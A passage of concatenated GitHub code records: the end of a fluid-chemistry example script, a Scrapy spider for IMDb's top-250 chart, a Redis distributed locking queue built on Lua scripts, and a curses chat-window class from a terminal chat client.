df.to_csv(r'E:\\work\\data\\low-T\\general_result.csv', index=False)\n\n# aqueous species determined in LA-ICP-MS analysis\nspecies = {\n 'Na+': 1,\n 'K+': 2,\n}\nfluid = FluidPitzer(\n x0=(3, 3),\n species=species,\n # melting temperature of the last solid\n t=25,\n # the last melting solid\n solids=['KCl']\n)\n\nresult = fluid.optimize()\n\nprint(result)","repo_name":"pypitzer/pypitzer","sub_path":"src/examples/quantification/fi_quantification.py","file_name":"fi_quantification.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"1356033666","text":"import scrapy\n\nclass imdbSpider(scrapy.Spider):\n name = 'imdb_name'\n start_urls = [ \n 'https://www.imdb.com/chart/top/'\n ]\n\n def parse(self, response):\n # title = response.css('title::text')[0].extract()\n # title = response.css('title::text').extract_first() # extract_first is better than [0]\n title = response.css('h1.header::text').extract()\n subtitle = response.css('div.byline::text').extract()\n title_movie = response.xpath('//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"titleColumn\", \" \" ))]//a/text()').extract()\n year_movie = response.xpath('//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"secondaryInfo\", \" \" ))]/text()').extract()\n rating = response.xpath('//strong/text()').extract()\n yield {'titletext' : title, 'subtitle' : subtitle, 'title_movie' : title_movie, 'year_movie' : year_movie, 'rating' : rating}","repo_name":"emaddar/IMDB-Scraper","sub_path":"imdb/imdb/spiders/imdb_spider.py","file_name":"imdb_spider.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31975160414","text":"\"\"\"\nDistributed Locking Queue for Redis adapted from the Redlock algorithm.\n\"\"\"\nimport random\nimport sys\nimport time\nfrom itertools import chain\n\nfrom . import util\nfrom . import exceptions\nfrom . import log\n\n\n# Lua scripts that are sent to redis\nSCRIPTS = dict(\n # keys:\n # h_k = ordered hash of key in form: priority:insert_time_since_epoch:key\n # Q = sorted set of queued keys, h_k\n # Qi = sorted set mapping h_k to key for all known queued or completed items\n #\n # args:\n # expireat = seconds_since_epoch, presumably in the future\n # client_id = unique owner of the lock\n # randint = a random integer that changes every time script is called\n\n # returns 1\n lq_put=dict(keys=('Q', 'h_k'), args=(), script=\"\"\"\nredis.call(\"ZINCRBY\", KEYS[1], 0, KEYS[2])\nreturn 1\n\"\"\"),\n\n # returns 1 if got an item, and returns an error otherwise\n lq_get=dict(keys=('Q', ), args=('client_id', 'expireat'), script=\"\"\"\nlocal h_k = redis.call(\"ZRANGE\", KEYS[1], 0, 0)[1]\nif nil == h_k then return {err=\"queue empty\"} end\nif false == redis.call(\"SET\", h_k, ARGV[1], \"NX\") then\n return {err=\"already locked\"} end\nif 1 ~= redis.call(\"EXPIREAT\", h_k, ARGV[2]) then\n return {err=\"invalid expireat\"} end\nredis.call(\"ZINCRBY\", KEYS[1], 1, h_k)\nreturn h_k\n\"\"\"),\n\n # returns 1 if got lock. Returns an error otherwise\n lq_lock=dict(\n keys=('h_k', 'Q'), args=('expireat', 'randint', 'client_id'), script=\"\"\"\nif false == redis.call(\"SET\", KEYS[1], ARGV[3], \"NX\") then -- did not get lock\n local rv = redis.call(\"GET\", KEYS[1])\n if rv == \"completed\" then\n redis.call(\"ZREM\", KEYS[2], KEYS[1])\n return {err=\"already completed\"}\n elseif rv == ARGV[3] then\n if 1 ~= redis.call(\"EXPIREAT\", KEYS[1], ARGV[1]) then\n return {err=\"invalid expireat\"} end\n return 1\n else\n local score = tonumber(redis.call(\"ZSCORE\", KEYS[2], KEYS[1]))\n math.randomseed(tonumber(ARGV[2]))\n local num = math.random(math.floor(score) + 1)\n if num ~= 1 then\n redis.call(\"ZINCRBY\", KEYS[2], (num-1)/score, KEYS[1])\n end\n return {err=\"already locked\"}\n end\nelse\n if 1 ~= redis.call(\"EXPIREAT\", KEYS[1], ARGV[1]) then\n return {err=\"invalid expireat\"} end\n redis.call(\"ZINCRBY\", KEYS[2], 1, KEYS[1])\n return 1\nend\n\"\"\"),\n\n # return 1 if extended lock. Returns an error otherwise.\n # otherwise\n lq_extend_lock=dict(\n keys=('h_k', ), args=('expireat', 'client_id'), script=\"\"\"\nlocal rv = redis.call(\"GET\", KEYS[1])\nif ARGV[2] == rv then\n if 1 ~= redis.call(\"EXPIREAT\", KEYS[1], ARGV[1]) then\n return {err=\"invalid expireat\"} end\n return 1\nelseif \"completed\" == rv then return {err=\"already completed\"}\nelseif false == rv then return {err=\"expired\"}\nelse return {err=\"lock stolen\"} end\n\"\"\"),\n\n # returns 1 if removed, 0 if key was already removed.\n lq_consume=dict(\n keys=('h_k', 'Q', 'Qi'), args=('client_id', ), script=\"\"\"\nlocal rv = redis.pcall(\"GET\", KEYS[1])\nif ARGV[1] == rv or \"completed\" == rv then\n redis.call(\"SET\", KEYS[1], \"completed\")\n redis.call(\"PERSIST\", KEYS[1]) -- or EXPIRE far into the future...\n redis.call(\"ZREM\", KEYS[2], KEYS[1])\n if \"completed\" ~= rv then redis.call(\"INCR\", KEYS[3]) end\n return 1\nelse return 0 end\n\"\"\"),\n\n # returns nil. markes job completed\n lq_completed=dict(\n keys=('h_k', 'Q', 'Qi'), args=(), script=\"\"\"\nif \"completed\" ~= redis.call(\"GET\", KEYS[1]) then\n redis.call(\"INCR\", KEYS[3])\n redis.call(\"SET\", KEYS[1], \"completed\")\n redis.call(\"PERSIST\", KEYS[1]) -- or EXPIRE far into the future...\n redis.call(\"ZREM\", KEYS[2], KEYS[1])\nend\n\"\"\"),\n\n # returns 1 if removed, 0 otherwise\n lq_unlock=dict(\n keys=('h_k', ), args=('client_id', ), script=\"\"\"\nif ARGV[1] == redis.call(\"GET\", KEYS[1]) then\n return redis.call(\"DEL\", KEYS[1])\nelse return 0 end\n\"\"\"),\n\n # returns number of items {(queued + taken), completed}\n # O(log(n))\n lq_qsize_fast=dict(\n keys=('Q', 'Qi'), args=(), script=\"\"\"\nreturn {redis.call(\"ZCARD\", KEYS[1]), redis.call(\"INCRBY\", KEYS[2], 0)}\n\"\"\"),\n\n # returns number of items {in_queue, taken, completed}\n # O(n) -- eek!\n lq_qsize_slow=dict(\n keys=('Q', 'Qi'), args=(), script=\"\"\"\nlocal taken = 0\nlocal queued = 0\nfor _,k in ipairs(redis.call(\"ZRANGE\", KEYS[1], 0, -1)) do\n local v = redis.call(\"GET\", k)\n if \"completed\" ~= v then\n if v then taken = taken + 1\n else queued = queued + 1 end\n end\nend\nreturn {queued, taken, redis.call(\"INCRBY\", KEYS[2], 0)}\n\"\"\"),\n\n # returns whether an item is in queue or currently being processed.\n # raises an error if already completed.\n # O(1)\n lq_is_queued_h_k=dict(\n keys=('Q', 'h_k'), args=(), script=\"\"\"\nlocal taken = redis.call(\"GET\", KEYS[2])\nif \"completed\" == taken then\n return {err=\"already completed\"}\nelseif taken then return {true, false}\nelse return {false, false ~= redis.call(\"ZSCORE\", KEYS[1], KEYS[2])} end\n\"\"\"),\n\n # returns whether an item is in queue or currently being processed.\n # raises an error if already completed.\n # O(N * strlen(item)) -- eek!\n lq_is_queued_item=dict(\n keys=('Q', 'item'), args=(), script=\"\"\"\nfor _,k in ipairs(redis.call(\"ZRANGE\", KEYS[1], 0, -1)) do\n if string.sub(k, -string.len(KEYS[2])) == KEYS[2] then\n local taken = redis.call(\"GET\", k)\n if taken then\n if \"completed\" == taken then return {err=\"already completed\"} end\n return {true, false}\n else\n return {false, true} end\n end\nend\nreturn {false, false}\n\"\"\"),\n\n)\n\n\nclass LockingQueue(object):\n \"\"\"\n A Distributed Locking Queue implementation for Redis.\n \"\"\"\n\n def __init__(self, mr_client, queue_path):\n \"\"\"\n `mr_client` - an instance of the MajorityRedis client.\n `queue_path` - a Redis key specifying where the queued items are\n \"\"\"\n if mr_client._threadsafe:\n self._client_id = random.randint(1, sys.maxsize)\n else:\n self._client_id = mr_client._client_id\n\n self._mr = mr_client\n self._params = dict(\n Q=queue_path, Qi=\".%s\" % queue_path,\n client_id=self._client_id)\n\n def size(self, queued=True, taken=True, completed=False):\n \"\"\"\n Return the approximate number of items in the queue, across all servers\n\n `queued` - number of items in queue that aren't being processed\n `taken` - number of items in queue that are currently being processed\n `completed` - number of items consumed from queue\n\n Because we cannot lock all redis servers at the same time and we don't\n store a lock/unlock history, we cannot get the exact number of items in\n the queue at a specific time.\n\n If the parameters, `taken` and `queued` are not both True or both False,\n the time complexity is O(n) and this can block Redis if you have\n a large queue. Otherwise, complexity is O(log(n))\n \"\"\"\n if not queued and not taken and not completed:\n raise UserWarning(\"At least one kwarg cannot be False\")\n if taken == queued:\n counts = (x[1] for x in util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_qsize_fast', self._mr._clients, **(self._params))\n if not isinstance(x[1], Exception))\n if completed and taken:\n return max(x[0] + x[1] for x in counts)\n i = 0 if taken else 1\n return max(x[i] for x in counts)\n\n counts = (x[1] for x in util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_qsize_slow', self._mr._clients, **(self._params))\n if not isinstance(x[1], Exception))\n i = 0 if queued else 1\n if completed:\n return max(x[2] + x[i] for x in counts)\n else:\n return max(x[i] for x in counts)\n\n def is_queued(self, h_k=None, item=None, taken=True, queued=True,\n completed=False):\n \"\"\"\n Return True if item is queued on majority of servers, False otherwise\n\n `item` - A value that we've put into the queue one or more times\n `h_k` - the item hash that uniquely identifies a put\n\n `queued` - item is queued but not currently being processed\n `taken` - item is currently being processed\n `completed` - item has been consumed from queue\n\n If passing an item hash, `h_k`, runtime is O(1)\n If passing an `item` runtime is a slow O(N), and blocks your redis\n while running. Try not to use this too often with large queues.\n Keep in mind that one item can be put many times, so an item can\n map to many item hashes. We return True if any of the item's\n item_hashes meets your query criteria (taken, queued, completed)\n \"\"\"\n if not taken and not queued:\n raise UserWarning(\"either taken or queued must be True\")\n results = list(self._is_queued(h_k, item))\n if h_k:\n self._verify_not_already_completed(results, h_k)\n nerrs, cnt = 0, 0\n clis = []\n for cli, taken_queued in results:\n clis.append((cli, taken_queued))\n if isinstance(taken_queued, Exception):\n if completed and str(taken_queued) == \"already completed\":\n return True\n nerrs += 1\n if nerrs > self._mr._n_servers // 2:\n raise exceptions.NoMajority(\n \"Too many exceptions from Redis servers\")\n elif taken and queued:\n cnt += (taken_queued[0] == 1 or taken_queued[1] == 1)\n elif taken:\n cnt += taken_queued[0] == 1\n elif queued:\n cnt += taken_queued[1] == 1\n if cnt > self._mr._n_servers // 2:\n return True\n return False\n\n def _is_queued(self, h_k, item):\n if h_k:\n assert ':' in str(h_k), \"did you pass wrong argument?\"\n results = util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_is_queued_h_k', self._mr._clients, h_k=h_k, **self._params)\n elif item:\n results = util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_is_queued_item', self._mr._clients,\n item=\":%s\" % item, **self._params)\n else:\n raise UserWarning(\"Must pass item or item_hash.\")\n return results\n\n def extend_lock(self, h_k):\n \"\"\"\n If you have received an item from the queue and wish to hold the lock\n on it for an amount of time close to or longer than the timeout, you\n must extend the lock!\n\n Returns one of the following:\n -1 if a redis server reported that the item is completed\n 0 if otherwise failed to extend_lock\n number of seconds since epoch in the future when lock will expire\n \"\"\"\n _, t_expireat = util.get_expireat(self._mr._lock_timeout)\n locks = list(util.run_script(\n SCRIPTS, self._mr._map_async, 'lq_extend_lock', self._mr._clients,\n h_k=h_k, expireat=t_expireat, **(self._params)))\n if not self._verify_not_already_completed(locks, h_k):\n return -1\n if not self._have_majority(locks, h_k):\n return 0\n # Re-lock nodes where lock is lost\n # Recovers state if we lost the lock on any individual nodes but still\n # have majority, This could cause extend_lock to timeout more\n # frequently, so it might not be a good idea if timeouts are very short\n # on the other hand, if we remove the list(...) call, this could create\n # a memory leak if polling_interval is too short.\n if util.lock_still_valid(\n t_expireat, self._mr._clock_drift, self._mr._polling_interval):\n list(util.run_script(\n SCRIPTS, self._mr._map_async, 'lq_lock',\n [cli for cli, rv in locks if \"%s\" % rv == \"expired\"],\n h_k=h_k, expireat=t_expireat, **(self._params)))\n return util.lock_still_valid(\n t_expireat, self._mr._clock_drift, self._mr._polling_interval)\n\n def consume(self, h_k):\n \"\"\"Remove item from queue. Return the percentage of servers we've\n successfully removed item on.\n\n If the returned value is < 50%, a minority of servers know that the\n item was consumed. The the item could get locked again\n if this minority of servers is entirely unavailable while another\n client is getting items from the queue.\n\n You choose whether a return value < 50% is a failure. You can also\n try to consume the same item twice.\n \"\"\"\n clients = self._mr._clients\n n_success = sum(\n x[1] == 1 for x in util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_consume', clients, h_k=h_k, **self._params))\n util.remove_background_thread(h_k, self._client_id)\n if n_success == 0:\n raise exceptions.ConsumeError(\n \"Failed to mark the item as completed on any redis server\")\n return 100. * n_success / self._mr._n_servers\n\n def put(self, item, priority=100, retry_condition=None):\n \"\"\"\n Put item onto queue. Return tuple like (%, h_k), where % is\n the percentage of servers we've successfully put to and h_k is a\n time and priority dependent hash of the item.\n\n If the returned percentage value is < 50, a minority of servers know\n about the item. If those servers die, this item will be lost. Your\n options are:\n - accept this risk and move on\n - call this function with special parameter, retry_condition.\n\n this.put('a', 101, majorityredis.retry_condition(lambda x: x\n\n `item` (str) an item you wish to queue.\n `priority` (num) an option to get this item off the queue before other\n items. Lower priority scores are gotten first.\n Priority is not guaranteed.\n\n `retry_condition` (func) continually retry calling this function until\n we successfully put to >50% of servers or a max limit is reached.\n see majorityredis.util.retry_condition for details\n\n >>> put('a', 100, retry_condition(nretry=10,\n backoff=lambda x: x + 1))\n\n If you wish, you may define a number > 50% like so:\n\n >>> put('a', 100, retry_condition(nretry=10,\n backoff=lambda x: x + 1,\n condition=lambda x: x[0] >= 80))\n \"\"\"\n h_k = \"%d:%f:%s\" % (priority, time.time(), item)\n if retry_condition:\n put = retry_condition(self._put, lambda x: x[0] > 50)\n else:\n put = self._put\n return put(h_k)\n\n def _put(self, h_k):\n rv = util.run_script(\n SCRIPTS, self._mr._map_async, 'lq_put', self._mr._clients,\n h_k=h_k, **self._params)\n cnt = sum(x[1] == 1 for x in rv)\n return 100. * cnt / self._mr._n_servers, h_k\n\n def get(self, extend_lock=True, check_all_servers=True):\n \"\"\"\n Attempt to get an item from queue and obtain a lock on it to\n guarantee nobody else has a lock on this item.\n\n Returns an (item, h_k) or None. An empty return value does\n not necessarily mean the queue is (or was) empty, though it's probably\n nearly empty. `h_k` uniquely identifies the queued item\n\n `extend_lock` - If True, extends the lock indefinitely in the\n background until the lock is explicitly consumed or\n we can no longer extend the lock.\n If False, you need to set a very large timeout or call\n extend_lock() before the lock times out.\n If a function, assume True and call function(h_k) if we\n ever fail to extend the lock.\n `check_all_servers` - If True, query all redis servers for an item.\n Attempt to obtain the lock on the first item received.\n If False, query only 1 redis server for an item and attempt to\n obtain a lock on it. If False and one of the servers is not\n reachable, the min. chance you will get nothing from the queue is\n 1 / n_servers. If True, we always preference the fastest response.\n \"\"\"\n t_start, t_expireat = util.get_expireat(self._mr._lock_timeout)\n client, h_k = self._get_candidate_keys(t_expireat, check_all_servers)\n if not h_k:\n return\n if self._acquire_lock_majority(client, h_k, t_start, t_expireat):\n if extend_lock:\n util.continually_extend_lock_in_background(\n h_k, self.extend_lock, self._mr._polling_interval,\n self._mr._run_async, extend_lock, self._client_id)\n priority, insert_time, item = h_k.decode().split(':', 2)\n return item, h_k\n\n def _get_candidate_keys(self, t_expireat, check_all_servers):\n \"\"\"Choose one server to get an item from. Return (client, key)\n\n If `check_all_servers` is True, use the results from the first server\n to that returns an item. This could be dangerous because it\n preferences the fastest server. If the slowest server for some reason\n had keys that other servers didn't have, these keys would be less likely\n to get synced to the other servers.\n \"\"\"\n if check_all_servers:\n clis = list(self._mr._clients)\n random.shuffle(clis)\n else:\n clis = random.sample(self._mr._clients, 1)\n generator = util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_get', clis, expireat=t_expireat, **self._params)\n\n failed_candidates = []\n winner = (None, None)\n for cclient, ch_k in generator:\n if isinstance(ch_k, Exception):\n failed_candidates.append((cclient, ch_k))\n else:\n winner = (cclient, ch_k)\n return winner\n failed_clients = (\n cclient for cclient, ch_k in chain(generator, failed_candidates))\n list(util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_unlock', failed_clients,\n h_k=ch_k, **(self._params)))\n return winner\n\n def _acquire_lock_majority(self, client, h_k, t_start, t_expireat):\n \"\"\"We've gotten and locked an item on a single redis instance.\n Attempt to get the lock on all remaining instances, and\n handle all scenarios where we fail to acquire the lock.\n\n Return True if acquired majority of locks, False otherwise.\n \"\"\"\n locks = util.run_script(\n SCRIPTS, self._mr._map_async, 'lq_lock',\n [x for x in self._mr._clients if x != client],\n h_k=h_k, expireat=t_expireat, **(self._params))\n locks = list(locks)\n locks.append((client, 1))\n if not self._verify_not_already_completed(locks, h_k):\n return False\n if not self._have_majority(locks, h_k):\n return False\n if not util.lock_still_valid(\n t_expireat, self._mr._clock_drift, self._mr._polling_interval):\n return False\n return True\n\n def _verify_not_already_completed(self, locks, h_k):\n \"\"\"If any Redis server reported that the key, `h_k`, was completed,\n return False and update all servers that don't know this fact.\n \"\"\"\n locks = list(locks)\n completed = [\"%s\" % l == \"already completed\" for _, l in locks]\n if any(completed):\n self._heal_completed(h_k, locks)\n return False\n return True\n\n def _have_majority(self, locks, h_k):\n \"\"\"Evaluate whether the number of obtained is > half the number of\n redis servers. If didn't get majority, unlock the locks we got.\n\n `locks` - a list of (client, have_lock) pairs.\n client is one of the redis clients\n have_lock may be 0, 1 or an Exception\n \"\"\"\n cnt = sum(x[1] == 1 for x in locks if not isinstance(x, Exception))\n if cnt < (self._mr._n_servers // 2 + 1):\n log.warn(\"Could not get majority of locks for item.\", extra=dict(\n h_k=h_k))\n list(util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_unlock', [cli for cli, lock in locks if lock == 1],\n h_k=h_k, **(self._params)))\n return False\n return True\n\n def _heal_completed(self, h_k, client_rv):\n \"\"\"The given item hash, `h_k`, is \"completed\" on at least 1 client.\n Mark it completed on the other servers that are up and not sending\n exceptions\"\"\"\n outdated_clients = (\n cli for cli, rv in client_rv if not isinstance(rv, Exception))\n list(util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_completed', clients=outdated_clients,\n h_k=h_k, **(self._params)))\n","repo_name":"adgaudio/MajorityRedis","sub_path":"majorityredis/lockingqueue.py","file_name":"lockingqueue.py","file_ext":"py","file_size_in_byte":21112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36404971824","text":"import curses\nimport textwrap\nimport time\n\nfrom libretro.protocol import Proto\nfrom libretro.FileTransfer import filesize_to_string\n\n\"\"\"\\\nWindow for printing chat messages.\nThe ChatMsgWindow is controlled by the ChatView class.\n\nInternally the messages are stored as a list of lines.\nEach list item is a tuple, where index 0 only is set\nif a line points to the beginning of a message.\n\n\tindex 0: message dict (or None)\n\tindex 1: text (string)\n\nThere are some special lines, determined by their prefix.\n\nA file info line:\n\t\"/F/F/F//\"\n\nAn 'unseen marker' (line between seen and unseen messages)\n\t\"/U/U/U\"\n\nA dimmed line starts with:\n\t\"/D/D/D\"\n\n\"\"\"\n\nclass ChatMsgWindow:\n\n\tdef __init__(self, gui):\n\n\t\tself.gui = gui\n\t\tself.W = gui.W['main']\n\t\tself.W.keypad(True)\n\n\t\t# Current communication partner.\n\t\tself.friend = None\n\n\t\t# All messages as a list of lines.\n\t\tself.lines = []\n\t\tself.num_msgs = 0\t# Number of messages\n\t\tself.num_unseen = 0\t# Number of unseen messages\n\n\t\tself.vy = 0\t# Index of 1th line shown at screen\n\t\tself.cy = 0\t# Index of currently selected line\n\n\t\t# Textwrapper for adjust message body to\n\t\t# window width\n\t\t_,w = self.W.getmaxyx()\n\t\tself.tw = textwrap.TextWrapper(w-4)\n\n\t\t# Screen content has changed?\n\t\tself.changed = True\n\n\n\tdef get_selected(self):\n\t\t\"\"\"\\\n\t\tReturn the currently selected message (dict)\n\t\tor None on error.\n\t\t\"\"\"\n\t\tif self.lines[self.cy][0] is not None:\n\t\t\treturn self.lines[self.cy][0]\n\t\telse:\treturn None\n\n\n\tdef delete_selected(self):\n\t\t\"\"\"\\\n\t\tDelete currently selected message from view.\n\t\t\"\"\"\n\t\tmsg_i = self.cy\n\t\tmsg_n = self.__selected_msg_nlines()\n\n\t\tfor i in range(msg_n+1):\n\t\t\tself.lines.pop(msg_i)\n\n\t\tif self.cy > len(self.lines):\n\t\t\tself.cy = self.__prev_msg_index()\n\t\tself.changed = True\n\n\n\tdef add_msg(self, msg):\n\t\t\"\"\"\\\n\t\tAdd message to line list.\n\t\tArgs:\n\t\t msg: Message dict\n\t\t\"\"\"\n\n\t\tif msg['unseen'] == 1:\n\t\t\t# If given message is \"unseen\" and there\n\t\t\t# were no \"unseen\" messages yet, add an\n\t\t\t# \"unseen\"-marker-line.\n\t\t\tif self.num_unseen == 0:\n\t\t\t\tself.lines.append((None, \"/U/U/U\"))\n\t\t\t\tself.lines.append((None, \"\"))\n\t\t\tself.num_unseen += 1\n\n\t\t# Add message header (dict)\n\t\tself.lines.append((msg, \"\"))\n\n\t\tif msg['type'] == Proto.T_FILEMSG:\n\t\t\t# File message\n\t\t\t# TODO What happens if filename too long?\n\t\t\tssize = filesize_to_string(msg['size'])\n\t\t\tself.lines.append((None, \"/F/F/F{}/{}/{}\"\\\n\t\t\t\t.format(msg['filename'], ssize,\n\t\t\t\t\tmsg['downloaded'])))\n\t\t\tif not msg['downloaded']:\n\t\t\t\tself.lines.append((None, '/D/D/D'\\\n\t\t\t\t\t'Press [ctrl+D] to download'))\n\t\telse:\n\t\t\t# Message\n\t\t\tself.__add_wrap_text(msg['msg'])\n\n\t\tself.lines.append((None, \"\"))\n\t\tself.num_msgs += 1\n\n\n\tdef set_msgs(self, msgs=[]):\n\t\t\"\"\"\\\n\t\tSet chat messages.\n\t\t\"\"\"\n\t\tself.num_msgs = 0\n\t\tself.num_unseen = 0\n\t\tself.cy = 0\n\t\tself.lines = []\n\n\t\tfor msg in msgs:\n\t\t\tself.add_msg(msg)\n\t\tself.reset_view()\n\n\n\tdef reset_view(self):\n\t\t\"\"\"\\\n\t\tSet view (self.vy) that latest message can be seen.\n\t\t\"\"\"\n\t\tlast_msg_y = self.__last_msg_index()\n\t\tif last_msg_y != None:\n\t\t\tself.cy = last_msg_y\n\t\tself.__adjust_view()\n\n\n\tdef scroll_up(self):\n\t\t\"\"\" Scroll up \"\"\"\n\t\ty = self.__prev_msg_index()\n\t\tif y != None:\n\t\t\tself.cy = y\n\t\t\tself.__adjust_view()\n\n\n\tdef scroll_down(self):\n\t\t\"\"\" Scroll down \"\"\"\n\t\ty = self.__next_msg_index()\n\t\tif y != None:\n\t\t\tself.cy = y\n\t\t\tself.__adjust_view()\n\n\n\tdef redraw(self, force_redraw=False):\n\t\t\"\"\"\\\n\t\tRedraw window\n\n\t\tLocks: self.gui.winLock\n\t\t\"\"\"\n\t\tif not self.changed and not force_redraw:\n\t\t\treturn\n\n\t\tself.gui.winLock.acquire()\n\t\ttry:\n\t\t\th,w = self.W.getmaxyx()\n\t\t\tself.W.clear()\n\n\t\t\ttry:\n\t\t\t\tself.__draw_headline(h, w)\n\n\t\t\t\ty = 2\n\t\t\t\tfor i,line in enumerate(self.lines[self.vy:]):\n\t\t\t\t\tif y >= h-1: break\n\n\t\t\t\t\tif line[0] is not None:\n\t\t\t\t\t\t# Start of message\n\t\t\t\t\t\tis_sel = self.vy+i == self.cy\n\t\t\t\t\t\tself.__print_msg_header(y, line[0], is_sel)\n\t\t\t\t\telif line[1][:6] == '/F/F/F':\n\t\t\t\t\t\tself.__print_file_msg(y, line[1])\n\t\t\t\t\telif line[1][:6] == \"/D/D/D\":\n\t\t\t\t\t\tself.W.addstr(y, 2, line[1][6:], curses.A_DIM)\n\t\t\t\t\telif line[1] == \"/U/U/U\":\n\t\t\t\t\t\tself.__print_unseen_marker_line(y, w)\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.__print_msg(y, line[1])\n\t\t\t\t\ty += 1\n\n\t\t\t\tself.__draw_scrollbar(2, w-2, h-3)\n\t\t\t\tself.W.border()\n\t\t\texcept:\n\t\t\t\t# Screen too small\n\t\t\t\tpass\n\t\t\tself.W.refresh()\n\t\tfinally:\n\t\t\tself.gui.winLock.release()\n\n\t\tself.changed = False\n\n\n\tdef remove_unseen_marker(self):\n\t\t\"\"\"\\\n\t\tRemove line \"/U/U/U\" and the trailing one from self.lines.\n\t\t\"\"\"\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\ti = self.lines.index((None,\"/U/U/U\"))\n\t\t\t\tself.lines.pop(i)\n\t\t\t\tself.lines.pop(i)\n\t\t\texcept ValueError:\n\t\t\t\tbreak\n\n\tdef close(self):\n\t\t\"\"\"\\\n\t\tClear and refresh chat message window.\n\t\t\"\"\"\n\t\tself.gui.winLock.acquire()\n\t\ttry:\n\t\t\tself.W.clear()\n\t\t\tself.W.refresh()\n\t\tfinally:\n\t\t\tself.gui.winLock.release()\n\n\t#-- PRIVATE ------------------------------------------------------\n\n\tdef __add_wrap_text(self, msg_text):\n\t\t\"\"\"\\\n\t\tAdd message text to line list.\n\t\t\"\"\"\n\t\tlines = msg_text.splitlines()\n\t\tfor line in lines:\n\t\t\tfor l in self.tw.wrap(line):\n\t\t\t\tself.lines.append((None, l))\n\n\tdef __draw_headline(self, h, w):\n\t\t\"\"\"\\\n\t\tDraw the 1th line (headline) of the chat message window.\n\t\t\"\"\"\n\t\tself.W.addstr(1, 1, \" \"*(w-2), self.gui.colors['Wb'])\n\t\tself.W.addstr(1, 1, \" Conversation with \" + self.friend.name,\n\t\t\tself.gui.colors['Wb']|curses.A_BOLD)\n\n\n\tdef __print_msg_header(self, y, msg, is_selected):\n\t\t\"\"\"\\\n\t\tPrint a message header \"SENDER (TIME)\"\n\t\tIf is_selected, sender name and time will\n\t\tbe shown underlined.\n\t\t\"\"\"\n\t\tsender = msg['from']\n\t\tdt = self.__format_msgtime(msg['time'])\n\n\t\tif sender == self.gui.cli.account.name:\n\t\t\tattr = self.gui.colors['b']\n\t\t\tsender = 'you'\n\t\telse:\tattr = self.gui.colors['g']\n\n\t\tu = curses.A_UNDERLINE if is_selected else 0\n\t\tself.W.addstr(y, 1, sender, attr|u)\n\t\tself.W.addstr(\" (\"+dt+\")\", curses.A_DIM|u)\n\n\n\tdef __print_unseen_marker_line(self, y, w):\n\t\t\"\"\"\\\n\t\tPrint a line marking the beginning of unseen\n\t\tmessages.\n\t\t\"\"\"\n\t\ts = \" {} new messages \".format(self.num_unseen)\n\t\tself.W.addstr(y, 1, \"-\"*(w-2), self.gui.colors['r'])\n\t\tself.W.addstr(y, int(w/2-len(s)/2), s, self.gui.colors['r'])\n\n\n\tdef __print_file_msg(self, y, line):\n\t\t\"\"\"\\\n\t\tPrint file message.\n\t\t/F/F/F//\n\t\t\"\"\"\n\t\tfname,fsize,downl = line[6:].split('/')\n\t\tself.W.addstr(y, 2, 'File ')\n\t\tself.W.addstr(\"'\"+fname+\"'\", curses.A_BOLD)\n\t\tself.W.addstr(\" (\"+fsize+\")\", curses.A_DIM)\n\n\n\n\tdef __print_msg(self, y, line):\n\t\t\"\"\"\\\n\t\tPrint message line to chat msg window.\n\t\tThis supports the following expression for styled\n\t\ttext ouput:\n\n\t\t **TEXT** Bold text\n\t\t __TEXT__ Underlined text\n\t\t ??TEXT?? Dimmed text\n\t\t ~~TEXT~~ Reverse text\n\t\t ##TEXT## Blinking text\n\t\t\"\"\"\n\t\tspecial = {\n\t\t\t'**' : curses.A_BOLD,\n\t\t\t'??' : curses.A_DIM,\n\t\t\t'~~' : curses.A_REVERSE,\n\t\t\t'__' : curses.A_UNDERLINE,\n\t\t\t'##' : curses.A_BLINK\n\t\t}\n\t\tactive = {}\n\t\tfor key in special.keys(): active[key] = 0\n\n\t\tattr = 0\n\t\ti = 0\n\t\tself.W.move(y, 2)\n\t\twhile i < len(line):\n\t\t\tch = line[i]\n\t\t\tif line[i:i+2] in special:\n\t\t\t\tspec = line[i:i+2]\n\t\t\t\tif active[spec] == 1:\n\t\t\t\t\tattr &= ~special[spec]\n\t\t\t\t\tactive[spec] = 0\n\t\t\t\telse:\n\t\t\t\t\tattr |= special[spec]\n\t\t\t\t\tactive[spec] = 1\n\t\t\t\ti += 2\n\t\t\telse:\n\t\t\t\tself.W.addch(ch, attr)\n\t\t\t\ti += 1\n\n\n\tdef __draw_scrollbar(self, y, x, h):\n\t\t\"\"\"\\\n\t\tDraw scrollbar at the right side of window.\n\t\t\"\"\"\n\t\t# Get max cursor y position\n\t\tcymax = len(self.lines) #- h - 1\n\t\tif cymax <= 0: cymax = 1\n\n\t\t# Get scrollbar block position\n\t\tbar_y = int(self.cy * ((h-1) / cymax))\n\t\tif bar_y > h-3: bar_y = h-3\n\n\t\tif len(self.lines) > h-1:\n\t\t\tself.W.addch(y, x, curses.ACS_UARROW, curses.A_BOLD)\n\t\t\tself.W.addch(y+1+bar_y, x, curses.ACS_BLOCK, curses.A_DIM)\n\t\t\tself.W.addch(y+h-1, x, curses.ACS_DARROW, curses.A_BOLD)\n\n\n\tdef __format_msgtime(self, msg_time):\n\t\t\"\"\"\\\n\t\tGet formatted time string from given\n\t\tmessage time.\n\t\t\"\"\"\n\t\ttm = time.strptime(msg_time, \"%y-%m-%d %H:%M\")\n\t\tnow = time.localtime()\n\n\t\tif tm.tm_year != now.tm_year:\n\t\t\t# Message is not from current year\n\t\t\treturn time.strftime(\"%m %b %Y %H:%M\", 